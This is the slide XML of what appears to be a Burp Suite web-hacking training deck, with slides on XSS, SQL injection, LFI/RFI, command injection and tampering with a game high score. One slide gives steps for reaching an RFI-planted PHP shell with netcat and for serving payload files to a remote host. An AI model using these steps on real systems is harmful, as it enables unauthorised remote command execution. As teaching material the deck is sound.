              <a:t>Adds Open/Save/Load Attack Configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party plugins and API for extending functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28541964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Agent – Fix XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="UA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266" t="8597" b="13868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632724" y="1242603"/>
            <a:ext cx="7878561" cy="4046702"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9968146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Agent – SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="UA2.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642" t="8389" b="16477"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="607061" y="1134818"/>
            <a:ext cx="7929878" cy="3921429"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21981015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LFI - Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="lfi.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125" t="5981" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1282782"/>
            <a:ext cx="7597870" cy="3907321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="665630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LFI - Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="lfi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640" t="8497" b="13658"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1282777"/>
            <a:ext cx="7636357" cy="3912443"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18635763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RFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi.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125" t="5552" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261402"/>
            <a:ext cx="7597870" cy="3928701"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13051429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RFI – Base Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi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125" t="8284" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261398"/>
            <a:ext cx="7597870" cy="3811113"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34720789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 RFI id Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi7.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316" t="6824" b="6824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740992" y="1333500"/>
            <a:ext cx="7662016" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25741985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RFI – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHP id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi2.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125" t="8284" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261398"/>
            <a:ext cx="7597870" cy="3811113"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5244545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RFI – Google </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi3.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8071" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1304158"/>
            <a:ext cx="7623528" cy="3821803"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="772642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RFI –  Google</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="rfi10.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5123" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1261400"/>
            <a:ext cx="7623528" cy="3950080"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1380113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 Tab – Free Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="burp_target.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4811" b="18643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1197267"/>
            <a:ext cx="7924800" cy="4185254"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37172769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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHP Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi8.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964" t="6824" b="6824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1333500"/>
            <a:ext cx="7610699" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22720217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RFI + Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="rfi5.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125" t="8071" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261398"/>
            <a:ext cx="7597870" cy="3821803"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290868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RFI Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC3AF31C-E971-CB43-A3B7-4379C1D4A1CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the terminal type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 127.0.0.1 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No prompt will be given, just type any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command to see the output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of running from apache you can launch the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ptyhon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> simple http server so that the PHP file will not be interpreted by your server but on the host application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python 2: # python -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python3: # python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All files in the directory where the simple server is launched from will be available for uploading to remote server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23771115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 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="commandInject.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964" t="5981" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1293472"/>
            <a:ext cx="7610699" cy="3907321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37839504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 Injection Base Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="commandInject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125" t="8710" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1272086"/>
            <a:ext cx="7597870" cy="3789734"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6298765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 Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="commandInject2.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125" t="8285" b="13232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1304157"/>
            <a:ext cx="7597870" cy="3944512"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18343016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Command Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="commandInject3.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964" t="8710" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1336227"/>
            <a:ext cx="7610699" cy="3789734"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18235598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Snake – Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Highscore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake.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287" t="15583" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779480" y="1333500"/>
            <a:ext cx="7585040" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2451657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Snake – Send POST To Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake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640" t="7860" b="6426"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1240016"/>
            <a:ext cx="7636357" cy="4307964"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22083709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Repeater – Test 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake2.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640" t="8071" b="11106"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1314847"/>
            <a:ext cx="7636357" cy="4062100"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1049372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 Tab – Pro Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="target_pro.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-352" b="-39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1111740"/>
            <a:ext cx="7924800" cy="4329343"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6610624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Snake – Repeater Test 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake3.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8284" b="9830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1240018"/>
            <a:ext cx="7623528" cy="4115549"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19289503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Snake - Comparer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake4.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7860" b="15886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1293468"/>
            <a:ext cx="7623528" cy="3832493"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42930176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Snake – Comparer - Word</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake5.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1" t="4829" r="30405" b="-24542"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-288052" y="1333501"/>
            <a:ext cx="9432052" cy="3771636"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40667404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Intruder – Payload Positions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake6.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640" t="8496" b="3875"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1272086"/>
            <a:ext cx="7636357" cy="4404172"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39842531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Snake – Payload 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake7.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8497" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1314847"/>
            <a:ext cx="7623528" cy="3800424"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23382615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Snake – Payload 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake8.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8284" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1250708"/>
            <a:ext cx="7623528" cy="3811113"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29105304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Snake Intruder – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Match</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake9.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8923" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1336227"/>
            <a:ext cx="7623528" cy="3779044"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9974165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Snake Intruder - Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake10.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611" t="6908" b="-753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792309" y="1240015"/>
            <a:ext cx="7559382" cy="4286584"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23100153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Snake Repeater – Add New High Score</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake1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478" t="8071" b="10255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1261398"/>
            <a:ext cx="7649186" cy="4104859"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33457680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Validate New High Score</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake12.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15583" b="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1333500"/>
            <a:ext cx="7623528" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3377753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Scanner – Pro Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="scanner_pro.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-4" b="31210"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1250721"/>
            <a:ext cx="7924800" cy="3634510"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142744238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Snake Intruder – Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Selection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake13.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935" t="6441" b="16887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="805138" y="1304163"/>
            <a:ext cx="7533724" cy="4179687"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31585506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Snake Intruder – Free – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Extract</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake14.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5519" b="11531"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1240021"/>
            <a:ext cx="7623528" cy="4168997"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
